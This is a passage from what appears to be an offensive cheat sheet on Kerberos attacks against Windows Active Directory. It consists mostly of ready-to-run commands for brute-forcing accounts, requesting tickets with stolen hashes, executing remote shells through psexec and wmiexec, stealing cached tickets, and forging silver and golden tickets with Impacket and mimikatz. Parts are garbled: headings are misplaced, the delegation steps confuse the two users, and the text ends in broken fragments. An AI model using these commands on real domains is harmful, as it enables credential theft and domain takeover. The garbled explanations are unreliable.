This is useful if you have a list of usernames and do not know which are valid on the domain. Can also be used to find from a list of valid users which are vulnerable to the more vicious attacks below.
# with a specified list of users and passwords
.\Rubeus.exe brute /users:$users_file /passwords:$pass_file /domain:$domain /outfile:$out_file
# Do a lookup for valid users and attack them
.\Rubeus.exe brute /passwords:$pass_file /outfile:$out_file
Password Spray
Similar to a brute force attack, but only use one (or a few) passwords. This minimizes the chances of account lockout. TODO: Add More
Kerberoast
TGS Service key is derived from NTLM hash, so having one can give the other.
# Request the TGT with hash (lm portion of the hash is optional)
python getTGT.py $domain/$user@$host -hashes $hash
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py $domain/$user@$host -aesKey $aes_key
# Request the TGT by supplying the password
python getTGT.py $domain/$user@$host:$password
# If the password is not provided it will be prompted for
# export the .ccache from above for use
export KRB5CCNAME=$ccache_file
# Execute remote commands with any of the following using the -k flag
python3 psexec.py $domain/$user@$host -k -no-pass
python3 smbexec.py $domain/$user@$host -k -no-pass
python3 wmiexec.py $domain/$user@$host -k -no-pass
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:$domain /user:$user /rc4:$ntlm_hash /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\$host cmd
Pass The Ticket
From Linux
Check type and location of tickets:
grep $ccache_name /etc/krb5.conf
If none return, default is /tmp/krb5cc_%{uid}.
# Will attempt injecting into other user processes to dump current user tickets
# For maximum effect, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Create an unlimited use ticket for a single service. After generating a Silver ticket, follow the same instructions as above to use
# To generate the Silver Ticket with the NTLM hash
python ticketer.py -nthash $ntlm_hash -domain-sid $domain_sid -domain $domain -spn $service_spn $user
# To generate the Siver ticket with an AES key
python ticketer.py -aesKey $aes_key -domain-sid $domain_sid -domain $domain -spn $service_spn $user
# To generate the Silver Ticket with the NTLM hash
kerberos::golden /domain:$domain /sid:$domain_sid /rc4:$ntlm_hash /user:$user /service:$service_name /target:$service_machine_hostname
# To generate the Siver ticket with an AES 128 key
kerberos::golden /domain:$domain /sid:$domain_sid /aes128:$aes128_key /user:$user /service:$service_name /target:$service_machine_hostname
# To generate the Siver ticket with an AES 256 key (default by Microsoft)
kerberos::golden /domain:$domain /sid:$domain_sid /aes256:$aes256_key /user:$user /service:$service_name /target:$service_machine_hostname
Golden ticket
Create a unlimited use ticket. It will be valid until the krbtgt password is changed or TGT expires. Tickets must be used right after created. Follow the same instructions as above to use.
# To generate the Golden Ticket with the NTLM hash
python ticketer.py -nthash $ntlm_hash -domain-sid $domain_sid -domain $domain $user_name
# To generate the Golden ticket with an AES key
python ticketer.py -aesKey $aes_key -domain-sid $domain_sid -domain $domain $user
# To generate the Golden Ticket with the NTLM hash
kerberos::golden /domain:$domain /sid:$domain_sid /rc4:$ntlm_hash /user:$user
# To generate the Golden ticket with an AES 128 key
kerberos::golden /domain:$domain /sid:$domain_sid /aes128:$aes128_key /user:$user
# To generate the Golden ticket with an AES 256 key (default by Microsoft)
kerberos::golden /domain:$domain /sid:$domain_sid /aes256:$aes256_key /user:$user
Allows a service impersonate the user to interact with a second service, with the privileges and permissions of the user
If a user has delegation capabilities, all its services (and processes) have delegation capabilities.
KDC only worries about the user who is talking to, not the process.
Any process belonging to the same user can perform the same actions in Kerberos, regardless of whether it is a service or not.
Unable to delegate if NotDelegated (or ADS_UF_NOT_DELEGATED) flag is set in the User-Account-Control attribute of the user account or user in Protected Users group.
Unconstrained delegation
User1 requests a TGS for $Service, of User2.
The KDC checks if User2 has the TrustedForDelegation flag set.
The KDC includes a TGT of User1 inside the TGS for $Service.
$Service receives the TGS with the TGT of User1 included and stores it for later use.
With
With using the 'brute' module
Using GetUserSPNs.py
Using with kerberoast module
Using getTGT.py
Using with asktgt module and
For KEYRING tickets, you can use to retrieve them.